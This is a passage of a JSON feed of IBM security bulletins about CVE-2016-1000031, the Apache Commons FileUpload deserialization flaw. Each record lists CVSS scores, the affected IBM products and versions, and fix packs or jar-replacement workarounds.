{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:27:11", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server that is shipped with IBM Rational ClearQuest (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T05:27:11", "id": "16DB31010331CDA102555C2016C4A080DD57DFC6949CFC06DB82104E0598F7E9", "href": "https://www.ibm.com/support/pages/node/567375", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:43:56", "description": "## Summary\n\nOpen Source Commons FileUpload Apache Vulnerabilities addressed by IBM Tivoli Composite Application Manager Agent for Application Diagnostics\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in IBM Tivoli Composite Application Manager for Application Diagnostics Managing Server, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Tivoli Composite Application Manager for Application Diagnostics 7.1 and above\n\n## Remediation/Fixes\n\nThe recommended solution is to apply IBM Tivoli Composite Application Manager for Application Diagnostics Managing Server 7.1 FixPack 4 IFix 2. The download link will be provided when it is available.\n\n## Workarounds and Mitigations\n\nThe following steps can be used to replace commons-fileupload-1.3.2.jar with commons-fileupload-1.3.3.jar in IBM Tivoli Composite Application Manager for Application Diagnostics Managing Server: \n\n1\\. Login to the host where IBM Tivoli Composite Application Manager for Application Diagnostics Managing Server Visualization Engine is installed (ITCAM for AD MSVE);\n\n2\\. Go to WAS_HOME/profiles/<MSVE profile>/installedApps/<MSVE cell>/ITCAM_Application.ear/octigate.web-ws51.war/WEB-INF/lib, replace commons-fileupload-1.3.2.jar with commons-fileupload-1.3.3.jar provided in this security bulletin;\n\n3\\. Restart MSVE's WebSphere server instance.\n\n![commons-fileupload-1.3.3.jar](/support/pages/system/files/support/swg/tivtech.nsf/0/dc19e8a79e05bf3d8525828800172a26/WorkaroundsMitigations/0.3E4.gif)commons-fileupload-1.3.3.jar\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:51:39", "type": "ibm", "title": "Security Bulletin: Open Source Commons FileUpload Apache Vulnerabilities (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:51:39", "id": "93AF3A0CB685837B7C985687A86604D2436D2B5919B3C105E801C3ADABAF8404", "href": "https://www.ibm.com/support/pages/node/570721", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:43", "description": "## Summary\n\nIBM Content Classification has addressed the following vulnerability. Apache Commons FileUpload,could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in the DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION: **Apache Commons FileUpload, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in the DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process_._ \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Content Classification 8.8\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nIBM Content Classification| 8.8| Use IBM Content Classification 8.8 [Fix Pack 10](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/Content+Classification&release=8.8&platform=Windows&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:19:00", "type": "ibm", "title": "Security Bulletin: IBM Content Classification is affected by a\u00a0Open Source Commons FileUpload Apache Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T12:19:00", "id": "08325F6AA0E5D32062B70EC20B7BAC73EDD2082F6016AADE25F93CC5C5945E15", "href": "https://www.ibm.com/support/pages/node/299127", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:42:15", "description": "## Summary\n\nIn the WebSphere Application Server (WAS) where the Rational Asset Manager(RAM) is deployed, a potential vulnerability in the Apache Commons FileUpload is identified. Information about this security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the **Remediation/Fixes** section.\n\n## Affected Products and Versions\n\n \nRational Asset Manager 7.5.3.2 and earlier. \n\n## Remediation/Fixes\n\nThe remediation is applicable for both Rational Asset Manager and WebSphere Application Server (WAS). \n\n\nFor applying fix on WAS, refer to the security bulletin specified in the following table for information about fixes.\n\n**Affected Supporting Product** | \n\n**Affected Supporting Product Security Bulletin** \n---|--- \n \nIBM WebSphere Application Server Version 8.0, 8.5 and 8.5.5 | \n\n[Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<https://www-01.ibm.com/support/docview.wss?uid=swg22011428>) \n \n\n\nFor applying fix on RAM, upgrade to **Rational Asset Manager 7.5.3.3** or **Download **the **iFix **as specified in the following table. \n**Version** | **Fix** \n---|--- \nRational Asset Manager 7.5.2.4 | Rational Asset Manager 7.5.2.4 iFix [Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Asset+Manager&fixids=ram7.5.2.4_iFix002&source=SAR>). \n \nNOTE: For support on other Rational Asset Manager versions, please contact IBM support. \n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-29T10:08:28", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in the WebSphere Application Server where the Rational Asset Manager is deployed. (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-29T10:08:28", "id": "9BE1D889C1BD77682655EB00AA0EE21AA5C7CCAA1F93287BB788D1CFC12BBD77", "href": "https://www.ibm.com/support/pages/node/567471", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:41", "description": "## Summary\n\nIBM FileNet Content Manager, IBM Content Foundation and IBM Case Foundation has addressed the following security vulnerability. \n \nAbility to execute remote attacker\u2019s arbitrary code on a target machine by leveraging the untrusted data in DiskFileItem class of Apache Commons FileUpload library. The affected \u201cApache Commons FileUpload\u201d has been upgraded to the fixed version v1.3.3. \n \nFor more information please refer to the X-Force database entries referenced below.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM FileNet Content Manager 5.2.1, 5.5.0 \nIBM Content Foundation 5.2.1, 5.5.0 \nIBM Case Foundation 5.2.1, 5.3.0\n\n## Remediation/Fixes\n\nTo address this vulnerability install one of the fixes listed below to upgrade to Apache Commons FileUpload v1.3.3 or higher. \n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nFileNet Content Manager / Content Foundation| 5.2.1 \n5.5.0| [PJ45055](<http://www.ibm.com/support/docview.wss?uid=swg1PJ45055>) \n[PJ45055](<http://www.ibm.com/support/docview.wss?uid=swg1PJ45055>)| [5.2.1.7-P8CPE-ALL-LA008](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=FileNet%20Product%20Family&product=ibm/Information+Management/FileNet+Content+Platform+Engine&release=5.2.1.8&platform=All&function=all>) \\- 1/15/2018 \n[5.5.0.0-P8CPE-ALL-LA001](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=FileNet%20Product%20Family&product=ibm/Information+Management/FileNet+Content+Platform+Engine&release=5.5.0.0&platform=All&function=all>) \\- 1/15/2018 \nCase Foundation| 5.2.1 \n5.3.0| [PJ45055](<http://www.ibm.com/support/docview.wss?uid=swg1PJ45055>) \n[PJ45055](<http://www.ibm.com/support/docview.wss?uid=swg1PJ45055>)| [5.2.1.7-P8CPE-ALL-LA008](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=FileNet%20Product%20Family&product=ibm/Information+Management/FileNet+Content+Platform+Engine&release=5.2.1.8&platform=All&function=all>) \\- 1/15/2018 \n[5.5.0.0-P8CPE-ALL-LA001](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=FileNet%20Product%20Family&product=ibm/Information+Management/FileNet+Content+Platform+Engine&release=5.5.0.0&platform=All&function=all>) \\- 1/15/2018 \n \nIn the above table, the APAR links will provide more information about the fix \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:19:02", "type": "ibm", "title": "Security Bulletin: IBM FileNet Content Manager, IBM Content Foundation, and IBM Case Foundation are affected by the ability to execute remote attacker\u2019s arbitrary code on a target machine vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T12:19:02", "id": "9CEBA1B39CCB6811A505F9227D3A8589890E3374E0755D8A3C0854B9E7E74B4F", "href": "https://www.ibm.com/support/pages/node/300149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:41:36", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about a security vulnerability affecting WAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, ClearCase Remote Client (CCRC) WAN server component. \n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x:**\n\n \nThis vulnerability only applies to the CCRC WAN server component, and only for certain levels of WebSphere Application Server.\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS) which is shipped with IBM Rational ClearCase. \n \n\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x| IBM WebSphere Application Server 8.0, 8.5 and 9.0.| [Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www.ibm.com/support/docview.wss?uid=swg22011428>) \n \n\n\n**ClearCase Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x| \n\n 1. Determine the WAS version used by your CCRC WAN server. Navigate to the CCRC profile directory (either the profile you specified when installing ClearCase, or `<ccase-home>/common/ccrcprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section.\n 2. Identify the latest available fix (per the bulletin listed above) for the version of WAS used for CCRC WAN server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n_For 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-07-10T08:34:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-07-10T08:34:12", "id": "D2C2FAA59189FC355096429F31F4AD0BE546851207D1F9D74226059031643143", "href": "https://www.ibm.com/support/pages/node/305265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:10", "description": "## Summary\n\nWebsphere Application Server is shipped with Predictive Customer Intelligence. Information about security vulnerabilities affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<https://www-01.ibm.com/support/docview.wss?uid=swg22011428>) for vulnerability details and information about fix.\n\n## Affected Products and Versions\n\nPredictive Customer Intelligence versions 1.0, 1.0.1, 1.1, 1.1.1, 1.1.2\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by Websphere Application Server which is/are shipped with Predictive Customer Intelligence. \n\nPrincipal Product and Version(s)| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nPredictive Customer Intelligence 1.0 and 1.0.1| Websphere Application Server 8.5.5| [](<http://http://www-01.ibm.com/support/docview.wss?uid=swg22011428>)[Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>) \nPredictive Customer Intelligence 1.1 and 1.1.1| Websphere Application Server 8.5.5.6| [Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>) \nPredictive Customer Intelligence 1.1.2| Websphere Application Server 9.0.0.4| [Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T20:13:10", "type": "ibm", "title": "Security Bulletin: A Security Vulnerability has been Identified in Websphere Application Server Shipped with Predictive Customer Intelligence (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-16T20:13:10", "id": "95CD62FEDAEA72A3108F90B80812DA1D38B9D58498C1F872BB283E27B2E4A609", "href": "https://www.ibm.com/support/pages/node/305219", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:45:05", "description": "## Summary\n\n \nIBM Kenexa LCMS Premier on Cloud has addressed a vulnerability that could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \n\n## Vulnerability Details\n\n \n**CVEID: **[_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n9.3, 9.4, 9.5,10.0, 10.1,10.2,11.0,11.1,11.2\n\n## Remediation/Fixes\n\nThis issue has been addressed in IBM Kenexa LCMS Premier 11.2 latest Fix level \n\nCustomers who are using an affected version should visit IBM Support Portal and open a Service Request (SR) to request an upgrade to latest fixed release.\n\n \n<https://www-947.ibm.com/support/entry/portal>\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:26:42", "type": "ibm", "title": "Security Bulletin: \nIBM Kenexa LCMS Premier on Cloud is affected by Open Source Commons FileUpload Apache Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T22:26:42", "id": "440EFFCF162389547EC94BA431325D2B42D5E91C496765EE6F12A65170790BDA", "href": "https://www.ibm.com/support/pages/node/301493", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:53:03", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud. Information about security vulnerabilities affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin: [Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>) for vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nWebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud, all versions.| IBM WebSphere Application Server: \n\n * Liberty \n * Version 9.0\n * Version 8.5 \n * Version 8.0 \n \n## ", "cvss3": {}, "published": "2018-06-15T07:08:46", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server bundled with IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:46", "id": "868FA6DB6C0D6319E1B3081CCB6B4C3817A1853F87C138E75E8C43A455725423", "href": "https://www.ibm.com/support/pages/node/302813", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T01:45:40", "description": "## Summary\n\nIBM Tivoli Application Dependency Discovery Manager (TADDM) is affected by an Apache Commons FileUpload vulnerability. TADDM has addressed this vulnerability.\n\n## Vulnerability Details\n\n \n**CVE-ID:** [CVE-2016-1000031](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) \n**Description:** IBM Tivoli Application Dependency Discovery Manager could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. An attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nTADDM 7.2.2.5 \nTADDM 7.3.0.3\n\n## Remediation/Fixes\n\n**Fix**\n\n| \n\n**VRMF**\n\n| \n\n**APAR**\n\n| \n\n**How to acquire fix** \n \n---|---|---|--- \nefix_taddm_7303_Commonsfileupload_FP320160323.zip| 7.3.0.3| \n\nNone \n\n| \n\n[Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/coOEH4W2AFkenko8PvdHCUxxpqj8v2Rd9auWWPspdbc/efix_taddm_7303_Commonsfileupload_FP320160323.zip>) \n \nefix_taddm_7225_commonsfileupload_FP520160209.zip| 7.2.2.5| \n\nNone \n\n| \n\n[Download eFix](<ftp://ftp.ecurep.ibm.com/fromibm/5p7T7KB3JdPJ5dVsQ9gpZmpcQZH11msM7gaXY3SJNxU/efix_taddm_7225_commonsfileupload_FP520160209.zip>) \n \n \nPlease get familiar with eFix readme in etc/efix_readme.txt \n\n\n## Workarounds and Mitigations\n\nThe only solution is to apply eFix prepared to specific TADDM version (7.2.2.5 or 7.3.0.3). This fix is only tested for TADDM versions 7.2.2.5 or 7.3.0.3 and should not be applied at other maintenance levels. Upgrade to the latest maintenance level to apply this fix.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:47:24", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload Vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 